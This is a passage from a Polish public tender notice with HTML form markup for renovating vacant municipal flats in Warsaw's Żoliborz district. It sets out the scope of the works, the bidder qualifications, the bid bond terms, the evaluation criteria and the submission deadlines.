wraz z opisem oznaczeń obwodów. Elektrycznych Wykonanie pomiarów ochronnych i przedstawienie protokołu.Lok. 8 przy ul. Gdańska 4a m. 28Branża budowlanaWymiana stolarki drzwiowej wewnętrznej w pokojach, kuchni i łazience, naprawa tynku (uzupełnienie ubytków po hakach), wykonanie pasów tynku po wymianie instalacji elektrycznej, przygotowanie powierzchni pod malowanie farbami, gruntowanie podłoży preparatami, dwukrotne malowanie farbami emulsyjnymi, dwukrotne malowanie farbami olejnymi lamperii w kuchni, rur i parapetów, zerwanie starej wykładziny z PCV, wykonanie nowego podłoża, ułożenie paneli w pokoju z wymianą listew przypodłogowych, w łazience rozebranie brodzika i wykonanie nowej zabudowy brodzika, wykonanie nowej posadzki z płytek, ułożenie na ścianie w pomieszczeniu kabiny natryskowej glazury, montaż nawiewników w oknach, wywiezienie materiałów z rozbiórki. Branża sanitarnaWymiana kuchni elektrycznej 2 płytowej, wymiana brodzika z kabiną natryskową, wymiana miski wc kompakt z sedesem, wymiana zlewozmywaka, wymiana baterii, wymiana syfonu oraz udrożnienie odpływu przyborów sanitarnych oraz opinia kominiarska.Branża elektryczna Demontaż opraw elektrycznych, osprzętu elektrycznego, przewodów, oraz osprzętu w tablicy mieszkaniowej. Wykucie bruzd pod przewody, oraz pod puszki elektryczne. Ułożenie przewodów do obwodów oświetleniowych, i gniazd. Wykucie otworów pod puszki, obsadzenie puszek. Wykonanie połączeń w puszkach, podłączenie osprzętu (wyłączników, przełączników, gniazd, przycisków) Montaż tablicy mieszkaniowej wraz z zabezpieczeniami, dzwonka, oraz lamp. Wykonanie schematu elektrycznego do INNOGY, wraz z opisem oznaczeń obwodów. Elektrycznych, wykonanie pomiarów ochronnych i przedstawienie protokołu.III Szczegółowy zakres prac.Zakres robót określają przedmiary robót, specyfikacja technicznego wykonania i odbioru robót budowlanych oraz wzór umowyV Termin wykonania robót.Przewidywany termin realizacji nie dłużej niż do dnia 24.12.2019 r. </span> <br/> <br/> <b>II.5) Główny kod CPV: </b> <span id="ctl00_ContentPlaceHolder1_cpv_glowny_przedmiot">45453000-7</span> <br/> <b> Dodatkowe kody CPV:</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kod CPV</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45311000-0</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45330000-9</TD></TR></TABLE> <br /> <br /> <b> II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>: <br/> Wartość bez VAT: <span id="ctl00_ContentPlaceHolder1_szacunkowa_wartosc_zamowienia_calosc"></span> <br/> Waluta: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_waluta_calosc">PLN</span> <br/> <i>(w przypadku umów ramowych lub dynamicznego systemu zakupów – szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i> </div> <br/> <b> II.7) Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: </b> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67">Nie</span> <br/> Określenie przedmiotu, wielkości lub zakresu oraz warunków na jakich zostaną udzielone zamówienia, o których mowa w art. 67 ust. 1 pkt 6 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67_tekst"></span> <br/> <b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b> <br /> miesiącach:&#160; <span id="ctl00_ContentPlaceHolder1_okres_w_miesiacach"></span> &#160;<i> lub </i> <b> dniach:</b> <span id="ctl00_ContentPlaceHolder1_okres_w_dniach"></span> <br /> <i>lub</i> <br /> <b> data rozpoczęcia: </b> <span id="ctl00_ContentPlaceHolder1_data_rozpoczecia"></span> &#160;<i> lub </i><b> zakończenia: </b> <span id="ctl00_ContentPlaceHolder1_data_zakonczenia"></span> <br /> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Okres w miesiącach</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Okres w dniach</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Data rozpoczęcia</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Data zakończenia</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'></TD><TD style='border: 1px solid black;border-collapse: collapse;'></TD><TD style='border: 1px solid black;border-collapse: collapse;'> </TD><TD style='border: 1px solid black;border-collapse: collapse;'>2019-12-24</TD></TR></TABLE> <br/> <b>II.9) Informacje dodatkowe: </b> <span id="ctl00_ContentPlaceHolder1_informacje_na_temat_katalogow"></span> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b> III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU </b> <br/> <div style="padding-left: 20px"> <b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_okreslenie_warunkow">1. Wykonawca skieruje do realizacji zamówienia co najmniej:a)	jedną osobę posiadającą uprawnienia kierownika budowy w branży ogólnobudowlanej, jedną osobę posiadającą uprawnienia budowlane w branży elektrycznej, jedną osobę posiadającą uprawnienia budowlane w branży sanitarnej. </span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_okreslenie_warunkow"></span> <br/> <b>III.1.2) Sytuacja finansowa lub ekonomiczna </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_okreslenie_warunkow">Posiada opłaconą polisę OC lub dokument równoważny</span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_informacje_dodatkowe"></span> <br/> <b>III.1.3) Zdolność techniczna lub zawodowa </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_okreslenie_warunkow">1.2.	spełniają warunki udziału w postępowaniu, dotyczące: zdolności technicznej lub zawodowej 1.	posiada doświadczenie w realizacji co najmniej 2 robót budowlanych o wartości nie mniejszej niż 60.000,00 zł brutto (każda). Wykonawca może wykazać się realizacją zamówień z okresu z okresu ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie; 2.	skieruje do realizacji zamówienia co najmniej:a)	jedną osobę posiadającą uprawnienia kierownika budowy w branży ogólnobudowlanej, jedną osobę posiadającą uprawnienia budowlane w branży elektrycznej, jedną osobę posiadającą uprawnienia budowlane w branży sanitarnej oraz dwóch pracowników zatrudnionych na umowę o pracę w wymiarze jednego etatu.</span> <br/> Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób: <span id="ctl00_ContentPlaceHolder1_czy_zdolnosc_techniczna_wymaga_wykonawcow">Tak</span> <br/> Informacje dodatkowe: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_informacje_dodatkowe"></span> </div> <b> III.2) PODSTAWY WYKLUCZENIA </b> <br/> <div style="padding-left: 20px"> <b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1 ustawy Pzp</b> <br/> <b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b> <span id="ctl00_ContentPlaceHolder1_czy_zamawiajacy_przewiduje_wykluczenie">Tak</span> Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia: <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_1">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_2">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 2 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_3">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 3 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_4">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 4 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_5">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 5 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_6">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 6 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_7">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 7 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_8">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 8 ustawy Pzp)</span> <br/> </div> <b> III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI </b> <br/> <div style="padding-left: 20px"> <b> Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_niepodleganiu_wykluczenia">Tak</span> <br/> <b> Oświadczenie o spełnianiu kryteriów selekcji </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_spelnienie_kryteriow">Nie</span> </div> <b> III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP: </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_dokumentow_zaswiadczen"></span> </div> <b> III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_warunkow_udzialu"></span> <br/> <b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_kryteriow_selekcji"></span> </div> <b> III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_potwierdzenie_okolicznosci"></span> </div> <b> III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6) </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_inne_dokumenty_niewymienione"></span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA IV: PROCEDURA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>IV.1) OPIS </b> <br/> <b>IV.1.1) Tryb udzielenia zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_tryb_udzielenia_zamowienia">Przetarg nieograniczony</span> <br/> <b>IV.1.2) Zamawiający żąda wniesienia wadium:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wadium">Tak</span> <br/> Informacja na temat wadium <br/> <span id="ctl00_ContentPlaceHolder1_wadium">1.	Forma wadium1)	Wadium może być wniesione w jednej lub kilku następujących formach:a)	pieniądzu – wpłata przelewem na rachunek bankowy:43 1030 1508 0000 0005 5087 4032 z dopiskiem „Wadium - przetarg nieograniczony naRemont lokali komunalnych mieszkalnych - pustostanów obejmującychI ZADANIEul. Krasińskiego 20 m. 11ul. Krasińskiego 27 m. 70ul. Krasińskiego 29 m. 104ul. Powązkowska 44b m.74II ZADANIEul. Bieniewicka 2a m. 35/36ul. Bieniewicka 2a m. 17ul. Marii Kazimiery 1 m.57/58ul. Gdańska 4a m.28w Dzielnicy Żoliborz m.st. Warszawy”.w treści tytułu wpłaty zaleca się podać nr sprawy ZGN/PZP/19/2019;b)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo – kredytowej, z tym, że zobowiązanie kasy jest zawsze zobowiązaniem pieniężnym;c)	gwarancjach bankowych;d)	gwarancjach ubezpieczeniowych;e)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości.2)	W przypadku wadium wnoszonego:a)	w pieniądzu - za termin wniesienia przyjmuje się chwilę uznania kwoty wadium na podanym wyżej rachunku bankowym. Zaleca się dołączenie do oferty kopii dowodu wniesienia wadium poświadczonej za zgodność z oryginałem przez wykonawcę (lub pełnomocnika w przypadku wykonawców występujących wspólnie);b)	w formie gwarancji lub poręczenia – dokument w swej treści musi zawierać deklarację o nieodwołalnej i bezwarunkowej zapłacie wymaganej kwoty wadium na pierwsze pisemne wezwanie zamawiającego (beneficjenta) powołującego się na okoliczności określone w art. 46 ust. 4a i ust. 5 ustawy Pzp i obejmować cały okres związania ofertą. Dokument należy złożyć w kasie urzędu (parter), natomiast kserokopię poświadczoną za zgodność z oryginałem przez wykonawcę (lub pełnomocnika w przypadku wykonawców występujących wspólnie) zaleca się załączyć do oferty. Przedmiotowy dokument winien być sporządzony w języku polskim.2.	Zwrot wadium1)	Zamawiający zwróci wadium:a)	wszystkim wykonawcom - niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem wykonawcy, którego oferta została wybrana jako najkorzystniejsza, z zastrzeżeniem ust. 3;b)	wykonawcy, którego oferta została wybrana jako najkorzystniejsza - niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego oraz **wniesieniu zabezpieczenia należytego wykonania umowy;c)	wykonawcy, który wycofał ofertę przed upływem terminu składania ofert - na jego wniosek.2)	Jeżeli wadium wniesiono w pieniądzu, zamawiający zwraca je wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez wykonawcę.3.	Zatrzymanie wadiumZamawiający zatrzyma wadium wraz z odsetkami w przypadkach wskazanych w art. 46 ust. 4a i ust. 5 ustawy Pzp.</span> </div> <br/> <b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zaliczek">Nie</span> <br/> Należy podać informacje na temat udzielania zaliczek: <br/> <span id="ctl00_ContentPlaceHolder1_przewiduje_udzielenie_zaliczek"></span> </div> <br/> <b> IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_zlozenie_katalogow_elektronicznych_informacje_dodatkowe"></span> </div> <br/> <b> IV.1.5.) Wymaga się złożenia oferty wariantowej: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_oferty_wariantowej">Nie</span> <br/> Dopuszcza się złożenie oferty wariantowej <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej">Nie</span> <br/> Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej_zasadniczej"></span> </div> <br/> <b> IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu </b> <br/> <i> (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne) </i> <div style="padding-left: 20px"> Liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_liczba_wykonawcow"></span> <br/> Przewidywana minimalna liczba wykonawców <span id="ctl00_ContentPlaceHolder1_minimalna_liczba_wykonawcow"></span> <br/> Maksymalna liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_wykonawcow"></span> <br/> Kryteria selekcji wykonawców: <br/> <span id="ctl00_ContentPlaceHolder1_znaczenie_warunkow_wykonawcow"></span> </div> <br/> <b> IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów: </b> <div style="padding-left: 20px"> Umowa ramowa będzie zawarta: <br/> <span id="ctl00_ContentPlaceHolder1_z_kim_umowa_bedzie_zawarta"></span> <br/> Czy przewiduje się ograniczenie liczby uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_ograniczenie_liczby_uczestnikow"></span> <br/> Przewidziana maksymalna liczba uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow_informacje_dodatkowe"></span> <br/> Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_obejmuje_ustanowienie"></span> <br/> Adres strony internetowej, na której będą zamieszczone dodatkowe informacje dotyczące dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie_informacje_dodatkowe"></span> <br/> W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_umowy_ramowej_dynamicznego_katalogow"></span> <br/> Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_pobranie_umowy_ramowej_dynamicznego_katalogow"></span> </div> <br/> <b>IV.1.8) Aukcja elektroniczna </b> <br/> <b> Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i> <span id="ctl00_ContentPlaceHolder1_aukcja_elektroniczna">Nie</span> <br/> Należy podać adres strony internetowej, na której aukcja będzie prowadzona: <br/> <span id="ctl00_ContentPlaceHolder1_adres_strony_na_ktorej_bedzie_prowadzona"></span> <br/> <b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b> <span id="ctl00_ContentPlaceHolder1_elementy_aukcji_elektronicznej"></span> <br/> <b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b> <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenia_do_przedstawianych_wartosci"></span> <br/> Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie termin ich udostępnienia: <span id="ctl00_ContentPlaceHolder1_informaje_udostepnione_wykonawcom"></span> <br/> Informacje dotyczące przebiegu aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_informaje_przebiegu_aukcji"></span> <br/> Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): <span id="ctl00_ContentPlaceHolder1_warunki_do_licytacji"></span> <br/> Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń: <span id="ctl00_ContentPlaceHolder1_wykorzystanie_sprzetu_elektronicznego"></span> <br/> Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_wymagania_dotyczace_rejestracji_wyk_aukcja"></span> <br/> Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa"></span> <br/>Czas trwania: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa_czas"></span> <br /> <br/> Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_wykonawcy_zakwalfikowani"></span> <br/> Warunki zamknięcia aukcji elektronicznej: <br/> <span id="ctl00_ContentPlaceHolder1_warunki_zamkniecia_aukcji"></span> </div> <br/> <b>IV.2) KRYTERIA OCENY OFERT </b> <br/> <b>IV.2.1) Kryteria oceny ofert: </b> <br/> <b>IV.2.2) Kryteria</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kryteria</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Znaczenie</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>cena</TD><TD style='border: 1px solid black;border-collapse: collapse;'>60,00</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>termin realizacji</TD><TD style='border: 1px solid black;border-collapse: collapse;'>40,00</TD></TR></TABLE> <br/> <b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony) <br/> <span id="ctl00_ContentPlaceHolder1_zastosowanie_procedury_pzp">Nie</span> <br/> <b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b> <br/> <b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b> <br/> Minimalne wymagania, które muszą spełniać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_minimalne_wymagania"></span> <br/> Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziane_jest_zastrzezenie"></span> <br/> Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert: <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziany_podzial"></span> <br/> Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów): <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_etapy_negocjacji"></span> <br/> Informacje dodatkowe <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_dodatkowe_informacje"></span> <br/> <br/> <b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b> <br/> Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_opis_potrzeb"></span> <br/> Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_informacja_wysokosc_nagrod"></span> <br/> Wstępny harmonogram postępowania: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_wstepny_harmonogram"></span> <br/> Podział dialogu na etapy w celu ograniczenia liczby rozwiązań: <span id="ctl00_ContentPlaceHolder1_IV_3_2_PodzialDialogu"></span> <br/> Należy podać informacje na temat etapów dialogu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_EtapyDialogu"></span> <br/> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_DodatkoweInformacje"></span> <br/> <b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b> <br/> Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_ElementyOpisu"></span> <br/> Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_PodzialNegocjacji"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_DodatkoweInfo"></span> <br/> <b>IV.4) Licytacja elektroniczna </b> <br/> Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_6"></span> </div> Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_7"></span> </div> Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_8"></span> </div> Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_9"></span> </div> Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa"></span> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa_czas"> Czas trwania: </span> <br /> <br/> Wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_4_10_wykonawcy_zakwalfikowani"></span> </div> Termin składania wniosków o dopuszczenie do udziału w licytacji elektronicznej: <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_11_data"></span> godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_11_godzina"></span> <br/> Termin otwarcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_12"></span> </div> Termin i warunki zamknięcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_13"></span> </div> <br/> Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_IstotnePostanowienia"></span> </div> <br/> Wymagania dotyczące zabezpieczenia należytego wykonania umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_14"></span> </div> <br/> Informacje dodatkowe: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_LicytacjeDodatkoweInformacje"></span> </div> <b>IV.5) ZMIANA UMOWY</b> <br/> <b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy">Nie</span> <br/> Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian: <br/> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy_tekst"></span> <br/> <b>IV.6) INFORMACJE ADMINISTRACYJNE </b> <br/> <br /> <b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i> <br /> <span id="ctl00_ContentPlaceHolder1_IV_6_1_sposob_udostepniania"></span> <br/> <b>Środki służące ochronie informacji o charakterze poufnym</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_1_srodki_ochrony"></span> <br/> <b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b> <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_4_data">2019-12-02</span>, godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_4_godzina">09:00</span>, <br/> Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem): <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_SkrocenieTerminu">Nie</span> <br/> Wskazać powody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_Powody"></span> <br/> Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu <br/>> <span id="ctl00_ContentPlaceHolder1_IV_4_4_jezyki">język polski</span> 